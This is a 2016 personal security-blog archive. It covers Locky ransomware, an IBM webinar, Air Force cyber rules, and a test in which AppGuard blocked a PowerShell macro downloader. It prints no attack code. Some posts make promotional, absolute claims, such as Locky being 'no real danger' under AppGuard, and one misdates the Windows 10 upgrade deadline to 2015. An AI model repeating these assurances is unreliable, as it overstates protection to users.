Monthly Archives: July 2016

Locky deployment methods just changed – Who cares?

30 July 2016

The Post ‘Locky Dropper Now Comes Embedded in the Loader’, published July 28, 2016 in the ReaQta Security Blog, clearly shows that the cyber criminals continuously develop and improve their products. In the past, Locky downloaded the encryption program from a command & control server. In the latest version the encryption program is embedded in the email attachment as strings. The moment the victim runs the loader, the encryption program is extracted from the strings to the User Space and executed from User Space.

This is no rocket science; simply the application of well-known obfuscation methods to the latest Locky variant.

And, with AppGuard installed on top of the security stack, this new Locky variant represents no real danger.

In my opinion, the next generation endpoint protection solutions available on the market will all deal effectively with this sort of zero-day malware. The example of AppGuard shows: It is simply install and forget.

With this, we will gain valuable time for the right and important things like the implementation of Two Factor Authentication or privileged accounts management, or the design of effective security procedures or user training. Unfortunately, the paradigm shift from prevention to detection prevents us from implementing and doing the right and important things. It’s time for a paradigm change…

Have a good weekend.

Webinar Digital Extortion: Will you pay the ransom?

27 July 2016

I attended the IBM Security Webinar “Digital Extortion: Will you pay the ransom?” this evening. Limor Kessem talked about the history of and the latest trends in ransomware. Robert Lelewski provides an overview of the means to guard against and to recover from ransomware attacks.

Robert Lelewski showed a really remarkable slide:

Train users to beware of threats

Train users to beware of threats

The message is simple: Your users are the first line of defense. User training is the most effective means of combating cyber-attacks.

For more details, see the IBM ransomware landing page.

Have a good day.

Ten things every Airman must know

23 July 2016

This was a really exciting week. I got lots of phishing and spear phishing mails. Attached at the spear phishing mails were Trojan downloaders disguised as invoices. All downloaders were programmed in JavaScript, and as always, the actual download commands and URLs were hidden in a haystack of JavaScript function definitions. And the scripts were all zero-days! It seems as if the cyber criminals are back from a relaxing holiday.

Yesterday evening, I started reading the Air Force Doctrine Document 3-12, Cyberspace Operations. The doctrine documents are definitely worth reading, in particular if one develops a cyber defense strategy for a company or a governmental organization. Appendix A states the 10 Commandments of Cyber Security which everyone should know:

APPENDIX A – TEN THINGS EVERY AIRMAN MUST KNOW

  1. The United States is vulnerable to cyberspace attacks by relentless adversaries attempting to infiltrate our networks at work and at home – millions of times a day, 24/7.
  2. Our adversaries plant malicious code, worms, botnets, and hooks in common websites, software, and hardware such as thumbdrives, printers, etc.
  3. Once implanted, this code begins to distort, destroy, and manipulate information, or “phone” it home. Certain code allows our adversaries to obtain higher levels of credentials to access highly sensitive information.
  4. The adversary attacks your computers at work and at home knowing you communicate with the Air Force network by email or by transferring information from one system to another.
  5. As cyber wingmen, you have a critical role in defending your networks, your information, your security, your teammates, and your country.
  6. You significantly decrease our adversaries’ access to our networks, critical Air Force information, and even your personal identity by taking simple action.
  7. Do not open attachments or click on links unless the email is digitally signed, or you can directly verify the source—even if it appears to be from someone you know.
  8. Do not connect any hardware or download any software, applications, music, or information onto our networks without approval.
  9. Encrypt sensitive but unclassified and/or critical information. Ask your computer security administrator for more information.
  10. Install the free Department of Defense anti-virus software on your home computer. Your computer security administrator can provide you with your free copy.

Gen Norton A. Schwartz, Chief of Staff, US Air Force

“Defending Our Networks and Our Country”

If your company hasn’t communicated the 10 Commandments of Cyber Security to the employees yet, just adapt the above rules and off you go!

Have a good weekend.

AppGuard is an important part of a comprehensive security stack

16 July 2016

In the past weeks I tried hard to get an idea of the capabilities of Blue Ridge Networks AppGuard. To be honest, I would not like to miss AppGuard anymore. AppGuard creates the really good feeling that, under certain conditions, many cyber-attacks are simply rendered ineffective.

AppGuard is a perfect means against all kind of Trojans and downloaders, in particular zero days. Characteristic for this kind of malware is that the malware directly drops a malicious program or downloads a malicious program from the attacker’s server and executes it afterwards. This includes e.g. most of the known Ransomware.

The User Space and MemoryGuard concept just blocks this kind of malware out-of-the-box, provided that the User Space concept is not undermined by a user who is working with high privileges permanently. In fact, if the user works with privileges which allow the Trojan program to store files outside the User Space, the concept will no longer work.

It is strongly recommended to work with the least possible privileges under normal conditions. For the case higher privileges are requested, set up an extra account with the required privileges and supply the credentials of this account if UAC requests higher privileges.

More advanced malware may try to use the Windows auto-elevation feature to acquire higher privileges and to compromise AppGuard. To protect from auto-elevation attacks just set UAC to ‘Always notify me’.

This works even in the case of a gaming computer, where e.g. WOW and TeamSpeak are heavily used. Why shouldn’t it work on a standard system?

In addition, it is strongly recommended to disable macro execution in all kind of office software, e.g. Microsoft Office, OpenOffice or LibreOffice.

Memory Guard protects against all kind of zero-day drive-by downloads, PuP (Potentially unwanted Programs) or file-less malware.

My comprehensive security stack

My comprehensive security stack. Click to enlarge.

 

AppGuard does not protect against any kind of password phishing attacks. Although popular internet browsers block many malicious URLs through URL reputation, e.g. SmartScreen Filtering in Internet Explorer or Firefox, this will not protect in the case of zero-days.

To reduce the likelihood of credential theft, turn on Two-Factor Authentication (TFA) for as many as possible internet services you use. If TFA cannot be enabled, choose a strong password and take care, means:

User awareness is the basic part of the entire security stack!

To put it succinctly: The proposed security stack will dramatically reduce the risk of cyber-attacks. Blue Ridge Networks AppGuard is an important component of this stack, in particular for the protection against all kind of zero-days.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a 6 years old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD.  The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kind of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution all kind of zero-day malware from user space. But how well works AppGuard in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified malware:

Antivirus Result Update
Fortinet WM/Poseket.A!tr.dldr 20160706
Qihoo-360 heur.macro.powershell.a 20160706
Symantec W97M.Downloader 20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a master piece of code:

AutoOpen Macro with Powershell code

AutoOpen Macro with PowerShell Code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

Invoice_201604469.doc. Click to enlarge.

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message

Blocked Program Message 1

Blocked Program Message

Blocked Program Message 2

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

Windows Error Message

Windows Error Message

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Windows 10 free update phase ends in July 2016

2 July 2016

It’s high time to migrate to Windows 10. The free update phase ends in July 2015, one year after the first release of the most secure Windows operating system ever.

Windows 10 is the best choice for home users and SME. The core Windows 10 OS with the integrated SmartScreen application and URL reputation check and Windows Defender already provides a good security out-of-the-box, at no additional cost.

With UAC set to ‘Always notify me’ and with the rigorous waiving to work constantly with administrative privileges, a high security level is achieved with small impact on usability

It’s time to get started!

Have a good weekend.